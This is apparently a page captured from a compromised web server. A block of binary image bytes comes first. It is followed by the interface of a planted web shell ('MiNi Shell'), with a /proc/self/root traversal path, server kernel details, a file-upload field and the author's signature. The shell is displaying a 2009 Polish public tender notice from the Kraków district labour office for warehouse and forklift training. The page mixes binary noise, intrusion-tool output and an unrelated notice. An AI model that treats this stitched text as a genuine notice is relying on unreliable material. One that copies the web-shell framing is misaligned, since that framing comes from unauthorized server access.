JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090401/86214-N-2009.html

<p class="kh_header"><b>Kraków: Postępowanie o udzielenie zamówienia publicznego 
prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 206 000 euro 
na usługę szkoleniową pod nazwą  
Magazynier, gospodarka magazynowa w zakresie pracy w handlu hurtowym oraz obsługa wózków jezdniowych (wszystkie typy), znak sprawy: ZP- 271/8/2009</b><br>
<b>Numer ogłoszenia: 86214 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego 
prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 206 000 euro 
na usługę szkoleniową pod nazwą  
Magazynier, gospodarka magazynowa w zakresie pracy w handlu hurtowym oraz obsługa wózków jezdniowych (wszystkie typy), znak sprawy: ZP- 271/8/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pod nazwą Magazynier, gospodarka magazynowa w zakresie pracy w handlu hurtowym oraz obsługa wózków jezdniowych (wszystkie typy) dla 30 osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego, w ramach trzech edycji po 10 osób każda.
2.	Celem szkolenia jest przygotowanie uczestników do pracy na stanowisku magazynier.
3.	Łączna ilość godzin szkolenia wynosi 240, w tym:
- zajęcia z zakresu pracy na wózku jezdniowym stanowią 88 godzin 60 - minutowych, w tym 44 godziny stanowią zajęcia praktyczne
- zajęcia z zakresu tematyki pracy na stanowisku magazynier stanowią 144 godziny 45 - minutowych
      - trening interpersonalny stanowiący 8 godzin 45 - minutowych
Zajęcia szkoleniowe dla każdej grupy, rozpoczynać się będą pierwszego dnia roboczego miesiąca. Warunek ten należy uwzględnić sporządzając harmonogram.
Dzienny wymiar zajęć dydaktycznych nie może przekroczyć 7 godzin zajęć teoretycznych oraz 8 godzin zajęć praktycznych.
Zajęcia odbywać się będą od poniedziałku do piątku, w godzinach pomiędzy 8.00 a 18.00 z uwzględnieniem dwóch przerw kawowych dla uczestników.
Miejsce realizacji szkolenia winno znajdować się w mieście Krakowie, w miejscu dogodnym pod względem dojazdu dla osób dojeżdżających z terenu Powiatu Krakowskiego. 
Zamawiający wymaga, aby zajęcia praktycznej nauki jazdy wózkiem jezdniowym odbywały się w maksymalnie 5 - osobowych grupach, co winno zostać uwzględnione w harmonogramie kursu.
4.	Wykonawca zobowiązany będzie do zapewnienia wszystkim uczestnikom materiałów dydaktycznych, jak również do przekazania jednego kompletu do Urzędu Pracy Powiatu Krakowskiego (jeżeli zachodzi taka konieczność, Wykonawca wlicza w cenę szkolenia koszt przeznaczonego dla UPPK zestawu materiałów dydaktycznych). Komplet materiałów dydaktycznych Wykonawca dostarczy do Zamawiającego, najpóźniej w dniu rozpoczęcia pierwszej edycji szkolenia. Dodatkowo, Wykonawca wyposaży uczestników kursu w niezbędne materiały biurowe i piśmienne.
5.	Szkolenie winno zakończyć się oceną nabytych umiejętności w postaci egzaminu, którego pozytywny wynik potwierdzony zostanie wydaniem zaświadczenia uprawniającego do obsługi wózka jezdniowego z napędem silnikowym oraz certyfikatu opatrzonego logo Unii Europejskiej, EFS a także logo projektu 7 Życzeń.
Na wniosek Wykonawcy Zamawiający prześle elektroniczną wersję wymaganych oznakowań i logo.
Kserokopia zaświadczenia uprawniającego do obsługi wózka jezdniowego z napędem silnikowym oraz wzór certyfikatu, potwierdzone za zgodność przez uprawnionego przedstawiciela Wykonawcy, winny być załączone do oferty. 
10.	Podstawowy zakres programu szkolenia winien być zgodny z programem nauczania na kursach dla kierowców wózków jezdniowych z napędem silnikowym Ośrodka Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach oraz obejmować zagadnienia związane z tematyką egzaminacyjną Urzędu Dozoru Technicznego dla ubiegających się o uzyskanie zaświadczenia kwalifikacyjnego osób obsługujących wózki jezdniowe podnośnikowe z mechanicznym napędem podnoszenia. Zagadnienia szkolenia dotyczące tematyki magazynier muszą zostać opracowane zgodnie ze standardami kwalifikacji i szkolenia zawartymi w modułowych Programach Szkolenia Zawodowego dostępnymi na stronie internetowej Ministerstwa Pracy      i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl.  
11.	Program szkolenia musi zawierać informacje, o których mówi Rozporządzenie Ministra Pracy i Polityki Społecznej z dn. 02  marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 476, poz. 315), a mianowicie:
a)	Nazwę i zakres szkolenia
b)	Czas trwania i sposób organizacji szkolenia
c)	Wymagania wstępne dla uczestników szkolenia
d)	Cele szkolenia
e)	Plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i praktycznej
f)	Treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
g)	Wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych
h)	Sposób sprawdzenia efektów szkolenia.
10.	Wykonawca zobowiązany będzie do prowadzenia odpowiedniej dokumentacji: 
a)	Dzienna listy obecności uczestników szkolenia;
b)	Dziennik zajęć zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych;
c)	Oświadczenia uczestników potwierdzających odbiór materiałów dydaktycznych i biurowych;
d)	Oświadczenia uczestników potwierdzających odbiór ciepłych posiłków;
e)	Imienna lista, na której uczestnicy szkolenia będą potwierdzać otrzymanie zwrotu kosztów przejazdu na szkolenie;
f)	Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenie; 
g)	Protokół z egzaminu, jeżeli zostanie przeprowadzony. 
11.	Wykonawca zobowiązany będzie do przechowywania dokumentów potwierdzających realizację przedmiotowego szkolenia, a w szczególności: programu szkolenia, harmonogramu, dokumentów związanych z kosztami kursu, kosztorys, listy obecności uczestników, do dnia 31 grudnia 2020 roku.
12.	Na zakończenie kursu, Wykonawca wypłaci uczestnikom szkolenia zwrot kosztów przejazdu w wysokości 10,00 PLN (słownie: dziesięć złotych 00/100) za każdy dzień obecności na zajęciach. Podstawą do naliczenia wysokości zwrotu będzie lista obecności. Kwotę zwrotu kosztów przejazdu za  uczestników kursu należy wliczyć w cenę szkolenia wskazaną w formularzu ofertowym.
13.	Na podstawie art. 41 ust.7 i ust. 8 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm.) Wykonawca zobowiązany będzie do ubezpieczenia uczestników kursu do następstw nieszczęśliwych wypadków z wyłączeniem osób posiadających prawo do stypendium szkoleniowego. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Wykonawca dokona ubezpieczenia kursantów na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć.
14.	Wykonawca zobowiązany będzie do informowania społeczeństwa o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczanie w dokumentacji szkoleniowej informacji o udziale Unii Europejskiej a także oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.7.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006)  i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013
12.	Wykonawca zapewni uczestnikom zajęć:
a)	dostęp do serwisu kawowego w postaci kawy, herbaty, wody mineralnej, drożdżówek lub ciasteczek; 
b)	jeden ciepły, jednodaniowy posiłek dziennie;
c)	materiały dydaktyczne i biurowe konieczne do przeprowadzenia zajęć.
13.	Wykonawca, pod  rygorem  utraty prawa do zapłaty za  szkolenie, zobowiązany będzie do niezwłocznego   poinformowania Zamawiającego  o:
a)	Nie zgłoszeniu się Uczestników na  szkolenie,
b)	Przerwaniu szkolenia lub rezygnacji  z  uczestnictwa oraz każdorazowej nieobecności skierowanych  osób bezrobotnych,
c)	Innych sytuacjach, które mają wpływ na realizację programu szkolenia. i umowy.
14.	Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 5 dni od dnia zakończenia szkolenia, następujących dokumentów:
a)	Oryginału ankiet oceniających przeprowadzonych wśród uczestników szkolenia;
b)	Oryginału imiennego wykazu osób, które ukończyły szkolenie;
c)	Oryginału imiennego wykazu osób, które nie ukończyły szkolenia; 
d)	Kserokopii rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji poświadczony za zgodność z oryginałem;
e)	Kserokopii dziennika zajęć poświadczona za zgodność z oryginałem;
f)	Kserokopii list obecności poświadczona za zgodność z oryginałem;
g)	Kserokopii protokołu z egzaminu;
h)	Oryginału kosztorysu powykonawczego;
i)	Kserokopii wszystkich zaświadczeń i certyfikatów potwierdzających ukończenie szkolenia, poświadczone za zgodność z oryginałem;
j)	Oryginału oświadczeń uczestników potwierdzających odbiór materiałów dydaktycznych, ciepłych posiłków;
k)	Oryginału imiennej listy, na której uczestnicy potwierdzą otrzymanie zwrotu kosztów przejazdu;
l)	Inną dokumentację niezbędną do rozliczenia kursu.
15.	Wykonawca winien zapewnić uczestnikom szkolenia warunki do nauki uwzględniające zasady BHP mając na uwadze Rozporządzenie Ministra Gospodarki w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. z 2002 r., Nr 70, poz. 650 z późn. zm.) Wykonawca musi zapewnić dostęp do placu manewrowego przystosowanego do zajęć praktycznych dla 5-osobowych grup. Wykonawca musi także zapewnić salę szkoleniową przystosowaną do prowadzenia zajęć i wyposażoną  w co najmniej, tablicę do pisania, modele, plansze, rysunki, nagrania. Pojazdy wykorzystywane do prowadzenia szkolenia powinny być przystosowane do nauki jazdy i spełniać wymagania określone w przepisach w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia. Do oferty należy załączyć informację dotyczącą lokalizacji, w której realizowane będą zajęcia wraz ze szczegółowym opisem wyposażenia sal dydaktycznych, a  w przypadku zajęć praktycznych, w Wykazie dostępnych narzędzi i urządzeń wymienić należy te, które wykorzystywane będą podczas zajęć. 
16.	Wykonawca zobowiązany będzie do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia, m.in. na podstawie formularza ankiety oceniającej - stanowiącej załącznik nr 8 do SIWZ, jak również do przedstawienia jej wyników Zamawiającemu. 
17.	Wykonawca, przed rozpoczęciem szkolenia, zobowiązany będzie do zapoznania jego uczestników ze szczegółowym programem poprzez przekazanie im harmonogramu realizowanych zajęć..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych:
1.	Posiadają uprawnienia do wykonywania  określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności uzyskali wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej;
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub będą dysponować potencjałem     technicznym i osobami zdolnymi do wykonania zamówienia, a w szczególności
a.	przeprowadzili w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 3 szkolenia z zakresu gospodarki magazynowej i obsługi wózków jezdniowych. Przeprowadzone szkolenia mają obejmować łącznie wszystkie elementy wskazane w nazwie przedmiotowego zamówienia; 
b.	przeszkolili z zakresu gospodarki magazynowej i obsługi wózków jezdniowych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 30 osób; 
c.	dysponują lub będą dysponować co najmniej pięcioma wózkami jezdniowymi. Wózki te będą przeznaczone do realizacji niniejszego zamówienia w celu odbycia zajęć praktycznych.
2.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
3.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonych oświadczeniach i dokumentach wyszczególnionych  w  dziale IV SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. Niespełnienie tych warunków będzie skutkować wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> PROJEKT  WSPÓŁFINANSOWANY 
Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO
REALIZOWANY W RAMACH 
PODDZIAŁANIA 6.1.3
PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - liczba przeprowadzonych szkoleń z zakresu gospodarki magazynowej i obsługi wózków jezdniowych - 10</li>
<li>3 - liczba osób przeszkolonych z zakresu gospodarki magazynowej i obsługi wózków jezdniowych - 10</li>
<li>4 - certyfikatu jakości usług, który potwierdzałby wysoki standard świadczonych usług - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro
stanowisko dziennika podawczego-pokój 901.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT  WSPÓŁFINANSOWANY 
Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO
REALIZOWANY W RAMACH 
PODDZIAŁANIA 6.1.3

Creat By MiNi SheLL
Email: jattceo@gmail.com